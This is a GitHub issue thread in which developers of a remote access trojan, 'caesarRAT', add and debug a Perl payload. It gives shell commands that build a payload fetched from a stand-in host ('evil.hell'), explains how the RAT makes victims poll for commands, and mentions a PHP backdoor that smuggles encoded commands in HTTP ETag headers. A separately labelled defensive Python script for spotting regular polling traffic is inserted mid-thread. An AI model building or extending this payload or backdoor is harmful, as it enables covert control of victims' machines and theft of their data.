Add Perl client #2

Closed
gottburgm opened this issue Feb 14, 2018 · 9 comments

@gottburgm

Hello again!

I installed and tried your RAT and all was fine except one thing... I hate Python and the generated client payload was in Python 😃 So I made an equivalent in Perl. Let me know if you are interested in it and I will create a repo on my git with the file. I will also have a look at the pp packager and if I have time I will make a generator.

@gottburgm
Author

Forked Repository

caesarRAT

Perl Payload Builder

  • Instructions
   git clone https://github.com/gottburgm/caesarRAT caesarRAT-forked
   cd caesarRAT-forked 
   sh install.sh
   cd Client
   perl builder.pl perl_payload http://evil.hell/caesar_install/
  • client.py <=> outputs/perl_payload.pl

    • NOTE: set the DEBUG variable to 1 to see some useful information logged into debug.log
  • client.exe <=> outputs/perl_payload

@0blio
Owner

0blio commented Feb 14, 2018

Nice work! Thank you. One of the goals of the project is to "translate" the payload into as many languages as possible.
I just tested your Perl payload and it works great apart from a few small problems.

  1. When I try to change directory via cd, the payload correctly changes the directory but returns the following output to the server:
    Warning: Couldn't Move To : <directory_name_here>

[Screenshot from 2018-02-14 12-10-45]

  2. When I try to start a blocking process like xcalc, the Perl payload waits until the calc is closed.
    It should spawn a subprocess with the calc and add it to a list of subprocesses.

[Screenshot from 2018-02-14 12-15-27]

For the rest it works perfectly, compliments. I'll add it to the main project once it is fixed.
My objective would be to create a unique generator that allows selecting the type of payload, the language, the delay, etc.

@gottburgm
Author

Thanks for the feedback! The first bug will be fixed today, and for the second one I will need to look at how to handle this, because the Python way of managing processes is totally different from the Perl one that I usually use, but I will find something ;) I'll keep you informed!

@0blio
Owner

0blio commented Feb 15, 2018

Any update?

@gottburgm
Author

In fact I fixed the first bug in a few seconds yesterday but I forgot to commit hahahahaha. The second problem is really more problematic. I tried some stuff but it was really not stable. There is also a major problem, I think. Actually the number of requests done with the Python client is crazy, and with the Perl one, fewer requests but still too many. The second problem that I have is the database stuff. The RAT is way too slow, because we are sending plaintext data, and we store it each time and read the database each time. I made a backdooring tool which gives you a fake shell and sends the commands to a PHP backdoor file. It was hard and I avoided the storing feature because it's too big. I was passing encoded instructions through the ETag HTTP header and storing all the outputs in files that I could read or download. But I made many precoded functions to be able to have something usable. What do you think?

@0blio
Owner

0blio commented Feb 15, 2018

The database is the only way to keep track of the user history (input, output, datetime of the request, datetime of the response and many more).
In the future the target history will be exportable in a convenient dump in order to allow local analysis, so I think the database is important.

Caesar can be slow because HTTP is stateless. We're not connected directly via socket so, in order to make the target execute a command, we have to:

  1. Insert our request in the database
  2. Wait for the victim to request new commands to execute from the server (the requests in the pseudo-shell mode are performed once per second, else once every 10 seconds)
  3. Wait for the victim to execute the command
  4. Wait for the victim to respond to the server (based on the internet connection speed of the target)

So the average response time is 2 or 3 seconds.
Most of the free web services don't support sockets and don't let you open ports, so an HTTP implementation was the only possible thing to do.

I'm curious to see your backdooring tool, commit it if you want. I will give it a look.
Soon I'm also gonna test the new Perl shell (with cd fix).
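
The polling model described in the comment above (a client that fetches commands at a fixed rate, once per second in pseudo-shell mode and once every 10 seconds otherwise) leaves a regular timing pattern in web proxy logs. As an added example that is not part of the original thread or the project's code, this Python detector flags clients whose request gaps cluster on one or two fixed intervals; the log format, host names, paths and thresholds are all assumptions.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

def parse(line):
    """Parse 'ISO-timestamp client method url' (constructed log format)."""
    ts, client, _method, url = line.split()
    u = urlsplit(url)
    # Group on host + path only: poll requests often vary the query string.
    return datetime.fromisoformat(ts), (client, u.hostname, u.path)

def find_polling(lines, min_requests=8, min_share=0.2, coverage=0.8):
    """Map (client, host, path) -> sorted cadences in seconds for clients whose
    request gaps concentrate on one or two fixed intervals."""
    seen = defaultdict(list)
    for line in lines:
        ts, key = parse(line)
        seen[key].append(ts)
    hits = {}
    for key, stamps in seen.items():
        if len(stamps) < min_requests:
            continue  # too few samples to call anything periodic
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        buckets = Counter(round(g) for g in gaps)  # whole-second buckets absorb jitter
        # Keep at most two buckets (interactive and idle rate), ignoring
        # sub-second bursts (bucket 0) and buckets that are only noise.
        cadences = [(c, n) for c, n in buckets.most_common(2)
                    if c > 0 and n / len(gaps) >= min_share]
        if cadences and sum(n for _, n in cadences) / len(gaps) >= coverage:
            hits[key] = sorted(c for c, _ in cadences)
    return hits

def sample_log():
    """Constructed data: a client polling every ~10 s then every ~1 s, plus
    an ordinary browsing client with irregular gaps."""
    t0, lines = datetime(2018, 2, 15, 10, 0, 0), []
    poller = [10, 10.2, 9.9, 10, 10.1, 10, 1, 1.1, 0.9, 1, 1, 1.2, 1, 1]
    human = [3, 47, 1, 120, 15, 8, 300, 2, 61, 5]
    for client, url, gaps in (("10.0.0.5", "http://c2.example.test/poll.php?id=7", poller),
                              ("10.0.0.9", "http://intranet.example.test/wiki", human)):
        t = t0
        for gap in gaps:
            lines.append(f"{t.isoformat()} {client} GET {url}")
            t += timedelta(seconds=gap)
    return lines

if __name__ == "__main__":
    for key, cadences in find_polling(sample_log()).items():
        print(key, "polls every", cadences, "seconds")
```

Whole-second bucketing only tolerates small jitter, so a client that deliberately randomizes its interval needs a wider bucket or a variance-based test instead.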

@gottburgm
Author

Yeah, I see, let me think about it, because there are some other ways to make it faster. I will commit in 1 hour (I need to finish my raid in World of Warcraft kek)

@gottburgm
Author

gottburgm commented Feb 16, 2018

Committed! There was a major stupid bug that removed the separator ("") as it was considered as a replacement var by the builder......

gottburgm/caesarRAT

@0blio
Owner

0blio commented Feb 16, 2018

Ok! I'm gonna test it in a few hours :)

xalphahkr mentioned this issue Jul 11, 2018
0blio closed this as completed Sep 17, 2018